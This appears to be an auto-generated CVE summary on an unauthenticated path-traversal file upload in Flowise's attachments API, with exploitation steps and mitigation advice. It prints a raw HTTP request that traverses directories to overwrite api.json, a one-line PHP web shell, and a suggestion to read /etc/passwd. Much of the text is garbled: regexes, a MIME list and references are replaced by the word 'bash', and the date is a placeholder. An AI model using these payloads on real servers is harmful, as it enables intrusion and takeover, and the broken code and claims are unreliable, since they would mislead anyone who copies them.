How the CVE Works:
The vulnerability arises in Flowise due to improper validation of user-supplied input in the `/api/v1/attachments` route, which is whitelisted and does not require authentication. When a file upload request is made, the system constructs a storage path using the `chatflowId` and `chatId` parameters from the request. These parameters are not validated for malicious input, allowing an attacker to perform path traversal. By manipulating these parameters, an attacker can upload arbitrary files to any directory on the server. For example, setting `chatId` to `../../../../../../root/.flowise/` and uploading a file named `api.json` can overwrite critical system files, leading to remote code execution, server takeover, or data theft.
DailyCVE Form:
Platform: Flowise
Version: v1.0.0
Vulnerability: Arbitrary File Upload
Severity: Critical
Date: 2023-10-XX
What Undercode Say:
Exploitation:
1. Path Traversal Payload:
Use `chatId=../../../../../../root/.flowise/` to traverse directories and overwrite critical files like api.json.
Example HTTP Request:
POST /api/v1/attachments/test/../../../../../../root/.flowise/ HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=-WebKitFormBoundary7MA4YWxkTrZu0gW
WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="files"; filename="api.json"
Content-Type: application/json
{"key": "malicious_value"}
WebKitFormBoundary7MA4YWxkTrZu0gW--
2. Remote Code Execution:
Upload a malicious script (e.g., shell.php) to a web-accessible directory and execute it.
Example Payload:
<?php system($_GET[bash]); ?>
3. Data Theft:
Overwrite or read sensitive files like `/etc/passwd` or database credentials.
Protection:
1. Input Validation:
Validate `chatflowId` and `chatId` to ensure they are UUIDs or alphanumeric strings.
Example Code:
const isValidUUID = (id: string) => /^[bash]{8}-[bash]{4}-[bash]{4}-[bash]{4}-[bash]{12}$/.test(id);
if (!isValidUUID(chatflowid) || !isValidUUID(chatId)) {
throw new Error('Invalid chatflowId or chatId');
}
2. Sanitize File Paths:
Use libraries like `path.resolve` to prevent path traversal.
Example Code:
const safePath = path.resolve(getStoragePath(), ...paths);
if (!safePath.startsWith(getStoragePath())) {
throw new Error('Invalid path');
}
3. Authentication:
Remove `/api/v1/attachments` from the whitelist and enforce authentication for all routes.
Example Code:
export const WHITELIST_URLS = [ '/api/v1/verify/apikey/', // Remove '/api/v1/attachments' ];
4. File Type Restriction:
Restrict uploaded files to specific MIME types and extensions.
Example Code:
const allowedMimeTypes = [bash];
if (!allowedMimeTypes.includes(file.mimetype)) {
throw new Error('Invalid file type');
}
5. Logging and Monitoring:
Monitor file uploads and log suspicious activity.
Example Code:
console.log(<code>File uploaded by ${req.ip}: ${file.originalname}</code>);
6. Patch Update:
Update Flowise to the latest version if a patch is released.
Commands:
- Check for Vulnerable Versions:
npm list flowise
- Apply Patches:
npm update flowise
References:
- bash
- bash
By following these steps, you can mitigate the risk of this critical vulnerability and protect your systems from exploitation.
References:
Reported By: https://github.com/advisories/GHSA-h42x-xx2q-6v6g
Extra Source Hub:
Undercode
